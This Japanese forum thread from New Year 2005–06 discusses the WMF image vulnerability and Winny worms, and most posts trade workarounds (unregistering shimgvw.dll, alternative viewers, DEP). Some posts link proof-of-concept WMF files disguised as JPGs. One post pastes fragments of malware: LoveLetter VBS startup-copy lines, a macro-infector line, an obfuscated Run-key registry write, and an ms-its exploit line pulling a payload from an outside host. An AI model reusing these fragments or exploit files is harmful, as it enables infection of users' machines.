> Windows 画像と Fax ビューア (Shimgvw.dll) を登録抹消する

これしても、>>34>>247にアンチウィルスが普通に反応するんだけど。
>>34>>247はまったく別のウィルスじゃないの?
もしくはShimgvw.dllの抹消が意味無いのか?
regsvr32 -u %windir%\system32\shimgvw.dllを実行した後、ちゃんと再起動したし
どうなってんだ?

291 :[名無し]さん(bin+cue).rar:2005/12/31(土) 16:09:48 ID:45qkpxFV0
OpenJane使ってるけど危ない?
バスター2005入れててもダメかね

292 :[名無し]さん(bin+cue).rar:2005/12/31(土) 16:13:14 ID:quXzRwN30
>>291
Susieプラグインで画像表示させとけばOK

293 :[名無し]さん(bin+cue).rar:2005/12/31(土) 16:14:01 ID:45qkpxFV0
>>292
ありまと

294 :[名無し]さん(bin+cue).rar:2005/12/31(土) 16:14:55 ID:0dwJeeSK0
>>290
regsvr32 -u %windir%\system32\shimgvw.dllは、Explorerから
shimgvw.dllを呼び出さないようにするだけ。
別のアプリ/ビューアから呼び出してると意味ない。

つか、アンチウイルスが普通に反応してるなら、それでいいやん。
>>34は、>>247の上(電卓)のWMFをJPGにリネームしただけのもの

295 :[名無し]さん(bin+cue).rar:2005/12/31(土) 16:29:16 ID:quXzRwN30
>>293
貼るの忘れてた。ここな
ttp://news19-2ch-news.blogspot.com/2005/12/jane.html

296 :[名無し]さん(bin+cue).rar:2005/12/31(土) 16:35:55 ID:E6HPrAiX0
>>247所に行ってみたら、16,036 バイトのファイルが落ちてきたんだけど、これをどうすると電卓が起動するの?

そのまま実行→ファイルを開くアプリケーションの選択ってのしか出てこない
JPGにして画像ビューアで実行→見れない。未対応って言われる

297 :[名無し]さん(bin+cue).rar:2005/12/31(土) 16:39:42 ID:E6HPrAiX0
ついでに>>34のも試したら

専ブラ→デコードエラー
IE→×マークで見れない

だった

298 :[名無し]さん(bin+cue).rar:2005/12/31(土) 16:50:08 ID:RQCocl2DO
MSは今ごろパッチ作ってんのかな?
休み返上で急いでほしいな

299 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:00:15 ID:wkq3a2ss0
いつ頃できるんだろね
さすがに正月開けてすぐとかは無理だよなあ

300 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:03:33 ID:Awl7JVQo0
http://media.spikedhumor.com/8944/Jingle_Bells_Reversed.swf

301 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:05:35 ID:LMN8IfM00
ニュイルスってなに?

302 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:05:38 ID:d+wBVshx0
もうクリスマス終わったよ

303 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:13:28 ID:qpUnJm/V0
>>299
あっちはクリスマス休暇がメインだから
仕事初めは1/2頃で早いんじゃないっけ

304 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:13:44 ID:zHQfJ5+a0
>>300
ウイルス入り

305 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:16:58 ID:E6HPrAiX0
どうやら家のPCは大丈夫なようだ。ヽ(・∀・)ノ ワーイ餅くってくる

306 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:17:03 ID:wkq3a2ss0
>>303
そうなんだ。なんにしても早くパッチが出来ることを願うばかりだよ。

307 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:31:39 ID:h/N25xO+0
任意のフォルダを任意の間隔(10秒とか)で監視。

ファイルが増えていたら、MagicByteを読んでファイルの種類を特定。

(拡張子に関係なくファイルの実構造が)WMFだったら問答無用で削除。(&ログに記録。)

監視継続……

というアプリを作ったら、少しは役に立つのですかね。
WinnyのDownフォルダ監視用として。


308 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:33:05 ID:y4GRguzA0
今さっきDLしたデータ解凍したら仁義なきキンタマって圧縮されたデータ入ってたんだが
これは解凍してないから大丈夫だよな?


309 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:41:51 ID:d+7Bd1E20
jpgにしこみコミックに混ぜる→ヽ(`Д´)ノウワァァァァン!!
なんて事にならない事を祈るばかりというわけかorz

310 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:43:40 ID:HCfdV2gD0
>>308
解凍してるのかしてないのかどっちだ

311 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:45:23 ID:quXzRwN30
>>308
さようなら

312 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:45:54 ID:y4GRguzA0
>>310
解凍した中に解凍してないデータがあったんだ

313 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:47:34 ID:RzwatKIk0
ウィルスバスター2005永久使用方法って需要ある?
Winnyで出回ってるやつの。

314 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:47:49 ID:wSQMBU2t0
98SEとかMeの人は、無問題なの?

315 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:47:56 ID:y4GRguzA0
>>311
まじで?

316 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:48:51 ID:zIguEyP90
>>308
大丈夫大丈夫、PCが壊れてもデータ流れても気にしないし問題ないよ

317 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:50:28 ID:bpesdnfS0
解凍したらダブルクリックしなくてもキンタマ発動させ得るんだから脅威としか言いようがな

318 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:50:33 ID:XJDIhDEqO
インリン様くらってしまったらどう対処すればいいか教えてください。

319 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:50:50 ID:MkpTj0SZ0
前スレの検証用のリンク踏んだがDEPなんたらでどっちも防げたわ。BYアス64 XP SP2

320 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:55:53 ID:hga/3YkF0
【JPG見たら】フォルダを開いたらサヨウナラ 最強の脆弱性誕生4【死んでいる】
http://news19.2ch.net/test/read.cgi/news/1135953016/470-471

321 :[名無し]さん(bin+cue).rar:2005/12/31(土) 17:59:34 ID:quXzRwN30
>>315
例えばzipの中にzipが入ってたってことだろ?
で、入ってたzipにキンタマ入ってると。
大丈夫だよ

322 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:01:04 ID:y4GRguzA0
>>321
そうそう

ユーザー名で動いてるsvchost無かったし大丈夫みたいだわ

323 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:02:00 ID:4I0Tx6g90
('A`)

324 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:06:15 ID:rzfRvPq50
>>309
パッチが出て脆弱性がふさがったとしても、拡張子jpgに変えて混ぜられたら激しくうざいな
ぱっと見では判らなくなる
これまでは拡張子がexeなんで簡単に取り除けたけど

325 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:11:32 ID:hsEkBALQ0
いま、オンラインスキャンしたらWORM_ANTINNY_Aに感染してた('A`)
ウイルスバスター入ってたんで、速攻削除したけど。俺もうだめぽだよな?

326 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:16:14 ID:131EitNLO
ウィルスなんて気にすんな

327 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:17:22 ID:VWP8fQQv0
>>325
(・∀・)コンニチハ!!

328 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:18:00 ID:hsEkBALQ0
>>326
WINNY始めて二日でやられた俺orz
結構注意してたはずなんだが・・・。
解凍できないファイルが原因だったか。

329 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:21:06 ID:iKu7jv/y0
  金子賢 ●1R腕ひし○ クレイジー
 近藤有己 ●判定0‐3○ 中村和裕
 トンプソン ○ 1R・KO ● J・シルバ
  瀧本誠 ●判定0‐3○ 菊田早苗
Aサンダー ○2R 一本● P・ナツラ
ヒョードル ○26秒殺● ズール 

330 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:27:07 ID:oFetGxvt0
>>209
それだった。

ただ、自分は元々完全スキャンにしてたはずなので、
もしかしたら30日のUPが再起動かかるUPだったから、
設定がリセット(変更)されてしまったのかも(想像)。

ちなみにNAV2004。

331 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:27:36 ID:131EitNLO
>>328
携帯使おうぜ

332 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:35:53 ID:0dwJeeSK0
>>324
注意すべき拡張子
bmp、dib、emf、gif、ico、jfif、jpg、jpe、jp2、jpeg、png、tif、tiff、wmf
激しくウザイ穴ですね

アルバムジャケットのJPEGに偽装、コミック/同人誌の途中の1ページ分だけ偽装
エロゲCG(JPG/GIF/BMP/PNG)にも混ぜ込める、アプリ/ツールのICOにも偽装可能……

欄検眼段が流行ったときにGJBをWindows Picture and Fax Viewerに関連付けし
てたなら、もちろんGJBも危険。

333 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:36:10 ID:hsEkBALQ0
>>331
なんで携帯を使うのか分からないが携帯モッテナス

334 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:37:48 ID:zHQfJ5+a0
>>325
おまえのデスクトップ見たよ

335 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:40:20 ID:131EitNLO
>>333
ウィルスかからないお

336 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:42:32 ID:hsEkBALQ0
>>334
そうか。やってないけどredstoneとかあったろ?or2

337 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:42:57 ID:Lx7BymJG0
ttp://www.vipper.org/vip169260.jpg
電卓が見えたら対策が必要

338 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:43:47 ID:hsEkBALQ0
>>337
見えたぞ!恐怖が!

339 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:44:38 ID:zHQfJ5+a0
>>337
ノートン先生がスルーだと!馬鹿な!

340 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:45:52 ID:131EitNLO
携帯だけど見えた!

341 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:47:44 ID:gH/UYsC40
戦慄した

342 :[名無し]さん(bin+cue).rar:2005/12/31(土) 18:49:11 ID:yHm+3b120
やべええええええ

343 :[名無し]さん(bin+cue).rar:2005/12/31(土) 19:05:41 ID:EVHt3E6h0
見れないよ

344 :[名無し]さん(bin+cue).rar:2005/12/31(土) 19:05:49 ID:lh/SwAVp0
>>337
お、見れね(・∀・)

345 :[名無し]さん(bin+cue).rar:2005/12/31(土) 19:09:32 ID:OxSmL1r60
ギコナビでマウスポインタ合わせてみたけど、×だった

別の奴はマウスポインタ合わせただけでウィルス特攻してきてブロックされてたけど

346 :[名無し]さん(bin+cue).rar:2005/12/31(土) 19:21:20 ID:hsEkBALQ0
なぁ、最近俺のウイルスバスター役に立ってない気がするの気のせいか?
ウイルス検索しても何もひっかからん。

347 :[名無し]さん(bin+cue).rar:2005/12/31(土) 19:22:43 ID:OxSmL1r60
>>346
私もウイルスバスターだけど・・・
単に感染してないだけじゃ?

348 :[名無し]さん(bin+cue).rar:2005/12/31(土) 19:23:23 ID:l+qGPW/r0
MS、再起動ごとにOSをもとに戻すツールを誰でも使えるよう日本語化し無償公開

本ソフトの仕組みは、ユーザーがHDDに対して行ったファイル操作を、実際には本ソフトが別途確保した
領域に記録し、再起動時に記録内容を破棄するというもの。
保護中は、たとえばユーザーがソフトをインストールしたりIEの設定を変更しても、再起動後はもとの
環境に戻る。保護をOFFにしたい場合は、Windowsの管理者としてログオンしてから設定画面を表示すればよい。
http://www.forest.impress.co.jp/article/2005/12/21/sharedtoolkit.html

不明なexeや、あやしいファイルを開くときは上記設定で実行して安全を確認してから再度インスコすれば無敵!?
もし、OKならネ申ツールということでつか?

349 :[名無し]さん(bin+cue).rar:2005/12/31(土) 19:23:42 ID:hsEkBALQ0
>>347
ANTINNYに引っかかっていたのがちょっとまえに発覚した。
スパイウェアで検索するべきかな

350 :[名無し]さん(bin+cue).rar:2005/12/31(土) 19:34:10 ID:hL3L/SV60
>>348
これ良さげだな。

>>329
ドサクサに紛れて・・・ ('A`)

351 :[名無し]さん(bin+cue).rar:2005/12/31(土) 19:36:42 ID:fw7fdffb0
ノートン更新後に>>247開いたらちゃんと先生が反応した。
つーことで登録抹消してたレジストリ元に戻して
今までどおりwindowsのビューアー使っても平気?
それとも、MSパッチまでは我慢してた方がいいの?
とりあえず画像はペイントで開いてる漏れ

352 :[名無し]さん(bin+cue).rar:2005/12/31(土) 19:43:53 ID:hjMdJwwf0
>>247のメモ帳ってテキストファイルが開くんだよね?
プニルで開いたら警告は出るがタブに見知らぬアイコンが出てて真っ白のページが出るけど
これダメなの?

353 :[名無し]さん(bin+cue).rar:2005/12/31(土) 19:46:20 ID:P//uz6ET0
>>351
亜種が出た場合に更新されるまでスルーするけどいいですか?

354 :[名無し]さん(bin+cue).rar:2005/12/31(土) 19:48:23 ID:fw7fdffb0
亜種かー こえーなー
じゃ〜オススメのビューアーはないですか?
軽くて単純なやつでいいんで

355 :[名無し]さん(bin+cue).rar:2005/12/31(土) 19:51:59 ID:3HplvSxX0
何つかってもペイントよかマシだと思うが
vixで良いんじゃないの

356 :[名無し]さん(bin+cue).rar:2005/12/31(土) 19:56:44 ID:M8DRChck0
>>329
見てしまったorz

357 :[名無し]さん(bin+cue).rar:2005/12/31(土) 19:58:58 ID:hnggqqAz0
アブネー
キンタマ踏むところだったぜ!!
nyは危険がいっぱいだな!!ふははははー

358 :[名無し]さん(bin+cue).rar:2005/12/31(土) 20:00:48 ID:Imd981kC0
<body onload=window()>

c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub


359 :[名無し]さん(bin+cue).rar:2005/12/31(土) 20:02:53 ID:MQro26wr0
>>358このレスでavast!が反応

360 :[名無し]さん(bin+cue).rar:2005/12/31(土) 20:03:39 ID:hsEkBALQ0
何も反応シナス(´・ω・`)

361 :[名無し]さん(bin+cue).rar:2005/12/31(土) 20:06:10 ID:JZmf+L+b0
>>337
やべー電卓起動したよ

362 :[名無し]さん(bin+cue).rar:2005/12/31(土) 20:06:28 ID:OxSmL1r60
>>358
ギコナビ反応なし

363 :359:2005/12/31(土) 20:09:58 ID:MQro26wr0
ありゃIEでみたら無反応だ
ぽけギコでみたら反応したけど

364 :[名無し]さん(bin+cue).rar:2005/12/31(土) 20:11:57 ID:YDprSrhx0
あヴぁさんが反応したじゃん

365 :[名無し]さん(bin+cue).rar:2005/12/31(土) 20:13:41 ID:Imd981kC0
>>295のJane対策大事だね

366 :[名無し]さん(bin+cue).rar:2005/12/31(土) 20:30:21 ID:WVcW6m250
>>351
ばーかw

367 :[名無し]さん(bin+cue).rar:2005/12/31(土) 20:32:30 ID:131EitNLO
Kerio起動してたらスレに書き込めん

368 :[名無し]さん(bin+cue).rar:2005/12/31(土) 20:32:44 ID:NtP0e5/j0
>>358
NGワードあぼ〜んで見れなかった。
前に設定してた

369 :[名無し]さん(bin+cue).rar:2005/12/31(土) 20:37:00 ID:0dwJeeSK0
>>351
Windowsのペイント経由だと危険なんだわさ
(対策しててもね)
ので、Vix等にしとけ

370 :[名無し]さん(bin+cue).rar:2005/12/31(土) 20:40:55 ID:fw7fdffb0
ペイントも危ないのか
じゃ〜vixにしとくよ 
ありがとさん

371 :[名無し]さん(bin+cue).rar:2005/12/31(土) 20:40:56 ID:k+6bnCtd0
画像見るならsusie使え

ってことでしょ?

372 :[名無し]さん(bin+cue).rar:2005/12/31(土) 20:42:26 ID:Dw+jm0eC0
vixは画像サイズ調整されないから使いにくい

373 :[名無し]さん(bin+cue).rar:2005/12/31(土) 20:46:01 ID:zHQfJ5+a0
このスレ開いたらいきなり反応してびびった

374 :[名無し]さん(bin+cue).rar:2005/12/31(土) 20:52:32 ID:fw7fdffb0
ラブレターuzeeeeeeeeeeeee!!!!!!!!!!!!!!!!!!!!!!
ログ消えるからむかつく

375 :[名無し]さん(bin+cue).rar:2005/12/31(土) 21:04:19 ID:Imd981kC0
 現時点(12月31日)での回避策として,マイクロソフトでは「Windows画像とFaxビューア(Windows Picture and Fax Viewer)」を無効にすることを挙げている。
Windows画像とFaxビューアのDLL「Shimgvw.dll」の登録を無効にする。具体的には,「ファイル名を指定して実行」に,


regsvr32 -u %windir%\system32\shimgvw.dll

と入力して実行する(「OK」をクリックする)。無効にすることで問題が発生した場合には,


regsvr32 %windir%\system32\shimgvw.dll

と入力して実行すれば有効になる。

 ただしSANS Instituteの情報によれば,アプリケーションの中には,Shimgvw.dllを直接呼び出して,レジストリに再登録するものがあるという。
このため,Shimgvw.dllを削除あるいは名前変更するほうがより安全だと考えられる。この場合には,パッチ適用前に復旧あるいは名前の再変更を忘れてはいけない。


376 :[名無し]さん(bin+cue).rar:2005/12/31(土) 21:13:20 ID:pjXecYyw0
前々から思ってたんだけど、XPでは「-u」なのか?
2000では「/u」なんだけど。

377 :[名無し]さん(bin+cue).rar:2005/12/31(土) 21:14:52 ID:WVcW6m250
>>369
ペイントでも危ない? 何故?

378 :[名無し]さん(bin+cue).rar:2005/12/31(土) 21:16:39 ID:HhOP/1UL0
画像閲覧にVIX使うとすれば画像ファイルの関連付けも
全部VIXに変えたほうがいいの?

379 :[名無し]さん(bin+cue).rar:2005/12/31(土) 21:22:20 ID:pIVoqrEL0
>>376 どっちでもok

380 :[名無し]さん(bin+cue).rar:2005/12/31(土) 21:45:44 ID:eDmaG+vy0
avastの設定してギコナビで更新したらavaが反応して
ギコナビでこのスレッド見れなくなった。

381 :[名無し]さん(bin+cue).rar:2005/12/31(土) 21:50:52 ID:9JskylRA0
haitest

382 :[名無し]さん(bin+cue).rar:2005/12/31(土) 21:52:50 ID:YDprSrhx0
m9

383 :[名無し]さん(bin+cue).rar:2005/12/31(土) 21:59:10 ID:3HplvSxX0
>>372
「サイズ調整」の意味がいまいちよくわからないが
画面にあわせたリサイズならしてくれるぞ

384 :[名無し]さん(bin+cue).rar:2005/12/31(土) 22:03:11 ID:36eBVebK0
カタログファイルがうざいな

385 :[名無し]さん(bin+cue).rar:2005/12/31(土) 22:04:37 ID:rMRIjy340
ttp://www.vieas.com/software/vieas.htm
カタログがウザいのなら、これは?

386 :[名無し]さん(bin+cue).rar:2005/12/31(土) 22:12:21 ID:yd5b/DPs0
なんだか知らんがny使用していると登録していないファイルまでダウンしている・・・
やべぇぇバスター05効いてねぇ・・・・

387 :[名無し]さん(bin+cue).rar:2005/12/31(土) 22:13:18 ID:HZDhqi++0
>>386

仕組みくらい理解汁

388 :[名無し]さん(bin+cue).rar:2005/12/31(土) 22:40:32 ID:0dwJeeSK0
とりあえず、画像ファイルを閲覧するのにShimgvw.dllを利用しない
独自dllのビューアは、susie、ViX、MangaMeeya

ExplorerやIE、では、shimgvw.dll の登録抹消による回避策が有効だが、
Windowsが実装しているMsPaint、他のアプリからダイアログでフォルダや
ツリーを表示するようなものを経由するとShimgvw.dllを呼び出して勝手に
再登録するのでアウト。google desktopもダメ。

Explorerでは、縮小表示/並べて表示にしていると、フォルダ開いた時点で
アウト。アイコン/一覧/詳細表示の場合は、問題のファイルアイコンを
選んだり、マウスカーソルをアイコンの上に持っていく(オーバー)とアウト。

389 :[名無し]さん(bin+cue).rar:2005/12/31(土) 22:41:19 ID:+A6VAwq00
>>386
ばーか

390 :[名無し]さん(bin+cue).rar:2005/12/31(土) 22:47:48 ID:prfATayF0
>>386
早くフォーマットした方がいいぞ

391 :[名無し]さん(bin+cue).rar:2005/12/31(土) 22:50:17 ID:uZKcgHSp0
ZeeDはShimgvw.dll使ってない?

392 :[名無し]さん(bin+cue).rar:2005/12/31(土) 22:53:00 ID:L235o86m0
>>388
dllの名前変えといたけど勝手に呼び出すアプリに対しても大丈夫なのかな

393 :[名無し]さん(bin+cue).rar:2005/12/31(土) 22:53:20 ID:pjXecYyw0
http://up.spawn.jp/file/up8426.png

394 :[名無し]さん(bin+cue).rar:2005/12/31(土) 22:58:21 ID:36eBVebK0
vixみたいにフォルダ内の画像が一括表示されて、カタログファイル
みたいな余計なもの作らないのないかね

395 :[名無し]さん(bin+cue).rar:2005/12/31(土) 23:13:54 ID:vzN1yOIP0
バグの改良検証用
ttp://ranobe.sakuratan.com/up/src/up79702.jpg

他のプログラムが起動するのでなく
Exploer・IEが100%負荷で死ぬ。
環境によるかもしれないけど

396 :[名無し]さん(bin+cue).rar:2005/12/31(土) 23:16:49 ID:L235o86m0
>>394
ファイル作らないように設定できなかったっけ?
俺はsusieのカタログ使ってるけど

397 :380:2005/12/31(土) 23:17:33 ID:eDmaG+vy0
K1見ながらやってたから時間かかった

398 :[名無し]さん(bin+cue).rar:2005/12/31(土) 23:31:18 ID:rqVTFbr80
>>394
ACDSeeみたいにまとめてシステム側でサムネイル作るのとかだったらいいってこと?

399 :394:2006/01/01(日) 00:06:37 ID:8vFLWKr50
すまそ自己解決、Leeyes辺りがいい感じなのでこれ使おう

400 :[名無し]さん(bin+cue).rar:2006/01/01(日) 00:20:00 ID:lEbrxsm60
ANTINNYに感染した影響なのか知らんけど、知らないファイルがDLされていた件

401 :[名無し]さん(bin+cue).rar:2006/01/01(日) 00:21:21 ID:KfpRgZN80
>>400
転送ってオチじゃないよな?

402 : 【大吉】 【1729円】 :2006/01/01(日) 00:21:25 ID:VaZtybSm0
>>400
お前は今年もダメな奴だな。

403 :[名無し]さん(bin+cue).rar:2006/01/01(日) 00:21:59 ID:LCxWO6Sf0
おまいらのXPはDEPで開くの阻止してくれないの?リンク踏もうがノートン反応するまでもないんだが

404 :[名無し]さん(bin+cue).rar:2006/01/01(日) 00:22:54 ID:lEbrxsm60
>>401
転送がなんのことかワカラナス

405 :[名無し]さん(bin+cue).rar:2006/01/01(日) 00:23:06 ID:Qtu3C9Eq0
>>400-401
はい終了

406 : 【大吉】 【1322円】 :2006/01/01(日) 00:24:33 ID:m6YD89lK0
おみくじ

407 :[名無し]さん(bin+cue).rar:2006/01/01(日) 00:24:40 ID:HXGS2wze0
このスレが更新されるたびにavast!が発動するんだけど

408 :[名無し]さん(bin+cue).rar:2006/01/01(日) 00:26:40 ID:g++Rvpzw0
>>403 DEPの対象を全部に
>>407 既出

409 :[名無し]さん(bin+cue).rar:2006/01/01(日) 00:27:52 ID:/Yo2btuT0
KeyJaneってSusieプラグイン使える?

410 :[名無し]さん(bin+cue).rar:2006/01/01(日) 00:28:46 ID:VHn1vyKT0
2chチェックするのめんどくさいから誰か携帯用のウイルス情報メルマガ発行してくれよ

411 :[名無し]さん(bin+cue).rar:2006/01/01(日) 00:30:26 ID:yNNrt/mX0
福袋きてるみたいだが、無敵ウイルス入ってそうでこえ〜

412 :[名無し]さん(bin+cue).rar:2006/01/01(日) 00:51:35 ID:JFIXY/DJ0
最終手段でshimgvw.dllを削除したのにIrfanViewで
wmvをjpgにリネームしたのを開こうとすると電卓起動する。
訳わからん、年始から疲れた、もう寝る。

413 :[名無し]さん(bin+cue).rar:2006/01/01(日) 00:52:09 ID:HXGS2wze0
はあ・・

414 :[名無し]さん(bin+cue).rar:2006/01/01(日) 00:52:53 ID:/OcJJYF20
速報 祭り警報 楽天で無料で買い物できちゃうヤバスギ
http://news19.2ch.net/test/read.cgi/news/1136036993/853-

速報 祭り警報 楽天で無料で買い物できちゃうヤバスギ
http://news19.2ch.net/test/read.cgi/news/1136036993/853-

速報 祭り警報 楽天で無料で買い物できちゃうヤバスギ
http://news19.2ch.net/test/read.cgi/news/1136036993/853-


415 :[名無し]さん(bin+cue).rar:2006/01/01(日) 01:09:48 ID:pARAuoZ/0
>>247のやつって、ローカルのexeを実行するだけだから、
>>247+ウイルス.exeのセットなのが危険なんだろ?
ようするに怪しいexeを先に削除したら、
>>247のやつに引っかかっても安全なんじゃねぇの?

416 :[名無し]さん(bin+cue).rar:2006/01/01(日) 01:11:36 ID:VaZtybSm0
>>415
超既出

417 :[名無し]さん(bin+cue).rar:2006/01/01(日) 01:12:21 ID:VaZtybSm0
>>415
途中で送っちゃった
スレを読み直してみ

418 :[名無し]さん(bin+cue).rar:2006/01/01(日) 01:22:00 ID:pARAuoZ/0
>416-417
既出だったが。すまんすまん。
つーことは、テンプレの
>・拡張子が.folderに変更されたHTMLからexeを実行させる
よりちょっと危険なヤツってことじゃん。
そこまでビビら無くても大丈夫。

419 :[名無し]さん(bin+cue).rar:2006/01/01(日) 01:26:39 ID:VaZtybSm0
>>126

420 :[名無し]さん(bin+cue).rar:2006/01/01(日) 01:28:23 ID:HOUXwEXf0
よくわからんが好きにコード走らせるんだったらexe実行するとかしないとか全然関係なくない?
それともwmfの出来る事ってそれだけなの?

421 :[名無し]さん(bin+cue).rar:2006/01/01(日) 01:29:07 ID:E2KP83i/0
UFJ銀行ホームページがブラクラみたいにwwwwwwwwww
http://ex14.2ch.net/test/read.cgi/news4vip/1136045619/

422 : 【ぴょん吉】 【1934円】 :2006/01/01(日) 01:57:17 ID:UU9h3GHM0
てst

423 :[名無し]さん(bin+cue).rar:2006/01/01(日) 02:59:44 ID:hGD4SgaP0
おまいら今年一年もよろしくな、張り切って著作権法違反でクズラックをぶっ壊そうじゃないか……アヒャヒャヒャヒャ

424 :[名無し]さん(bin+cue).rar:2006/01/01(日) 03:00:54 ID:u5OcQgME0
だが断る

425 :[名無し]さん(bin+cue).rar:2006/01/01(日) 03:01:15 ID:fJeOQjQP0
>>421
元旦早々笑えるネタだな

>>418
システムにあるだけでもformat.comとか実行できるわけだが、
サイト上に隠蔽してあるexeをgetさせて実行も可能だしな。
レジストリも好きなようにいじれるし、何でもできるんだが…

426 :[名無し]さん(bin+cue).rar:2006/01/01(日) 03:19:03 ID:HXGS2wze0
てすt

427 :[名無し]さん(bin+cue).rar:2006/01/01(日) 03:36:21 ID:6LbXWTQc0
>※窓の手などの管理ソフトでも簡単にオフに出来ます。

これって[自動実行タブ]で[DAEMON Tools]を[現在の自動実行プログラム]から[削除した自動実行プログラム]に移せばいいのか?

428 :[名無し]さん(bin+cue).rar:2006/01/01(日) 03:40:19 ID:Ult7bCVI0
昔、クリックしたらCDトレイが勝手にウィーンとでてくる画像を踏んだことがあるけど
そういうのなら笑えていいな。面白いから何度も踏んだ

429 : 【ぴょん吉】 【578円】 :2006/01/01(日) 03:40:53 ID:6LbXWTQc0
テスト


430 :[名無し]さん(bin+cue).rar:2006/01/01(日) 03:47:49 ID:fJeOQjQP0
>>428
今回のブツは、クリックする必要さえないわけだが…

431 :[名無し]さん(bin+cue).rar:2006/01/01(日) 03:55:53 ID:BceF+hX40
>>428
http://www.finjan.com/SecurityLab/SecurityTestingCenter/exploitFinjanPublicEXE.asp
こんなのどう?一番下のTEST MEってところをクリック。
ただのテトリスゲームと思いきや・・・。

432 :[名無し]さん(bin+cue).rar:2006/01/01(日) 04:08:42 ID:P8k2hTG50
Windows WMF Metafile Vulnerability HotFix
This week a new vulnerability was found in Windows:

http://www.microsoft.com/technet/security/advisory/912840.mspx

Browsing the web was not safe anymore, regardless of the browser.
Microsoft will certainly come up with a thouroughly tested fix for it in the future,
but meanwhile I developed a temporary fix - I badly needed it.

The fix does not remove any functionality from the system, all pictures will continue
to be visible. You can download it here:

http://www.hexblog.com/security/files/wmffix_hexblog.exe

こんなのあったけど、どんなもんでしょ

433 :[名無し]さん(bin+cue).rar:2006/01/01(日) 05:51:34 ID:fJeOQjQP0
ny上にも流れ始めた。C69関連の地引で、WMF脆弱性を突付くのをハケーン

(C69) (同人誌) [レズ萌え!] -Lezmoe Style- TIGER GYM (Fate/hollow atraxia).zip 4,849,079Bytes
001〜017.jpgがはいっているが、そのうち001.jpgが例のブツ(CRC32/563404F0)。

何をやるブツなのか、今、手元に隔離環境がないから怖くて解凍も検証もできんんん!!



434 :[名無し]さん(bin+cue).rar:2006/01/01(日) 05:56:38 ID:r6j4ZL8V0
>>395
開いた後だからかわからんが
Shareのローカルキャッシュのデコードがエラーはきまくった

435 :[名無し]さん(bin+cue).rar:2006/01/01(日) 06:23:18 ID:vgNHXkKJ0
一応対策は今したけど
nyとかwebで既に流れているんだよな・・・
いつごろから流れてたんだろうか

一応ウィルスチェックだけはしておくか・・

436 :[名無し]さん(bin+cue).rar:2006/01/01(日) 06:28:57 ID:fJeOQjQP0
>>433
自己レス。
何とかDOS窓でリネームして、バイナリエディタに突っ込んでみた。
検証用として出てるメモ帳起動のブツと構造はそっくり。ただ内部コードには差異が
あるので、比較的簡単にシステムに存在する“何か”を呼び出すものらしい。

>>435
脆弱性の発見は28日、29日あたりから海外Webでいくつか見つかる
31日には発見数が急増化、国内サイトでもいくつか出てきている(検証用を除く)
ny上には、昨日の時点では見つけられなかったが、さっき出てた。
ほとんどのセキュリティソフトが最新更新で見つけられるようになっている。

437 :[名無し]さん(bin+cue).rar:2006/01/01(日) 06:30:19 ID:vgNHXkKJ0
>>436
詳しい情報ありがとう。
感謝です。

438 :[名無し]さん(bin+cue).rar:2006/01/01(日) 06:40:48 ID:4u3UwyB50
マカフィは対策とあったが
マカフィは対策不十分みたいだけど

676 名前:名無しさん@お腹いっぱい。 投稿日:2006/01/01(日) 00:21:59
>>671=674 ?
ttp://grin.flagbind.jp/runcalc.wmf 電卓が起動するだけ
